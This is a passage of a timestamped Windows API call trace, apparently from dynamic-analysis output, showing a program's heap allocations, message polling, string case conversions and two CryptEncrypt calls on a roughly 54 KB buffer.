lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0089.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0089.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73d28 | out: hHeap=0x2af0000) returned 1 [0089.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0089.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0089.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0089.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0089.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0089.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0089.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0089.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0089.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0089.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0089.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0089.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0089.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0089.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0089.827] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0089.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0089.827] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0089.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0089.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0089.827] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0089.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0089.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0089.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0089.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73c50 [0089.827] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0089.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0089.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0089.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0089.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0089.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0089.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0089.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0089.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0089.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0089.828] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0089.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0089.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0089.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0089.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0089.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0089.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0089.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0089.828] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0089.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0089.828] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0089.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0089.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0089.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0089.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0089.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0089.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0089.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0089.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0089.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0089.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0089.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0089.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0089.829] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0089.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73c50 | out: hHeap=0x2af0000) returned 1 [0089.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0089.829] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0089.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0089.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0089.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0089.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0089.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0089.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0089.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.849] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0089.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0089.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0089.849] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0089.849] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0089.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0089.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0089.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0089.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0089.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0089.850] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0089.850] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0089.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0089.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0089.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0089.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0089.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0089.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0089.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0089.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0089.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0089.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0089.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0089.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0089.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0089.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0089.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0089.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0089.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0089.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.853] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0089.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0089.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0089.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0089.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0089.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0089.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0089.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0089.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0089.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0089.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0089.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0089.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0089.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0089.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0089.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9e50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0089.853] CryptEncrypt (in: hKey=0x9a4040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xd39f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xd3a0) returned 1 [0089.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.854] CharLowerBuffW (in: lpsz="byte[54176]", cchLength=0xb | out: lpsz="byte[54176]") returned 0xb [0089.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.855] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.855] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0089.855] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.855] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0089.855] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.855] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.855] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0089.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9dc0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0089.856] CryptEncrypt (in: hKey=0x9a4040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xd39f, dwBufLen=0xd3a0 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xd3a0) returned 1 [0089.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.858] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0089.858] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0089.858] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0089.858] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0089.858] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0089.858] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0089.858] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0089.858] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0089.858] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0089.858] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0089.858] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0089.858] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, 